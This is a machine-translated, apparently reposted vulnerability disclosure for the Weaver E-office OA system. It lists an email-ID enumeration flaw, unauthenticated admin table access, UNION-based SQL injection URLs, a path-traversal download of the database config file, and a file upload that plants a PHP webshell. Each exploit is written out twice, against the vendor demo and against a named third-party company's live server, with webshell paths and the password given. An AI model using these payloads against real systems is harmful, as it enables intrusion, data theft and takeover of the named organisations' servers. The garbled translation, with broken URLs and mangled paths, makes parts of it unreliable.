Weaver OA vulnerability set (SQL injection, unauthorized access, etc)

Source: Internet
Author: User

Weaver OA vulnerability set (SQL injection, unauthorized access, etc)

0x00: Some nonsense


No one has reported the following vulnerabilities. Do not repeat them with any vulnerabilities (points are definitely different )!

WooYun: Weaver E-office OA Management System # verify its versatility: SQL Injection, Arbitrary File Download, file upload, and other vulnerabilities

Here, we use (1) official demonstration (2) a case to demonstrate its general type.

The official test account is Xia Jing, and the test account is Cheng Lin.

0x01: Parallel excessive permissions, resulting in viewing email information of any user

 

Question: http://www.xxx.com/general/email/new/index.php? EMAIL_ID = 7


Problem parameter: EMAIL_ID

Problem description: traverses the value of the EMAIL_ID parameter to view others' mail information.


(1) official demonstration:

Http://eoffice8.weaver.cn: 8028/general/email/new/index. php? EMAIL_ID = 9503
 



Http://eoffice8.weaver.cn: 8028/general/email/new/index. php? EMAIL_ID = 9504
 



(2) Case study:

Http://www.sjd-logistics.com: 8000/general/email/new/index. php? EMAIL_ID = 726155
 



Http://www.sjd-logistics.com: 8000/general/email/new/index. php? EMAIL_ID = 726152
 

0x02: direct operation of data tables due to vertical disauthorization
 


Problem link: http://www.xxoo.com/ikernel/admin/

Problem description: After logging on to the OA system, you can access the ikernel directory, but the system prompts "no operation permission". In this case, you can directly access the ikernel/admin/directory, you can operate on the table structure and the table itself.


(1) official demonstration:

Some of the information displayed is garbled or unclear, so you can select all the information for convenience.
 


 


 



(2) Case study:
 


 


 


0x03: SQL injection vulnerability caused by vertical Elevation of Privilege


Question: http://www.xxx.com/ikernel/admin/IK_TABLE/field? TABLE_ID = 9

Problem parameter: TABLE_ID

Problem description: It seems that a lot of injection exists here, and only one point is selected in the test. Although gpc is on, the numeric type does not affect it.


(1) official demonstration:

Get Database Current user http://eoffice8.weaver.cn: 8028/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 user ()
 



Get the current database name http://eoffice8.weaver.cn: 8028/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 database ()
 



(2) Case study:

Get Database Current user http://www.sjd-logistics.com: 8000/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 user ()
 



Get the current database name http://www.sjd-logistics.com: 8000/ikernel/admin/IK_TABLE/field /? TABLE_ID = 9% 20and % 201 = 2% 20 union % 20 select % 20 database ()
 

0x04: File Download Vulnerability

 


Question: http://www.xxx.com/general/notify/show/header.php? ATTACHMENT_ID = 1738682577 & FILE_NAME =.../../inc/oa_config.php

Problem description: the download is a zend-encrypted file that can be decrypted online. This file contains the database link file. The test found that the official file is no longer an encrypted file.

(1) official demonstration:

Http://eoffice8.weaver.cn: 8028/general/pretty y/show/header. php? ATTACHMENT_ID = 1738682577 & FILE_NAME =.../../inc/oa_config.php
 



(2) Case study:

Http://www.sjd-logistics.com: 8000/general/pretty y/show/header. php? ATTACHMENT_ID = 1738682577 & FILE_NAME =.../../inc/oa_config.php
 

 


 

0x05: Arbitrary Code Execution caused by File Upload

Problem link: http://www.xxx.com/general/email/

Problem description: In the attachment of [internal mail]-[new mail], you can upload the php4 file type (the php4 file can be uploaded by capturing and modifying the package in the official demo ), view the source code to find the corresponding file path. Finally, the webshell access path is http://www.xxx.com/attachment/the desired region in the source code /file name .php4.

(1) official demonstration:

The obtained webshell address is: http://eoffice8.weaver.cn: 8028/attachment/1915193417/conf1g. php4 password 8
 


 



(2) Case study:

The obtained webshell address is: http://www.sjd-logistics.com: 8000/attachment/950753027/conf1g. php4 password 8
 


 

 

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.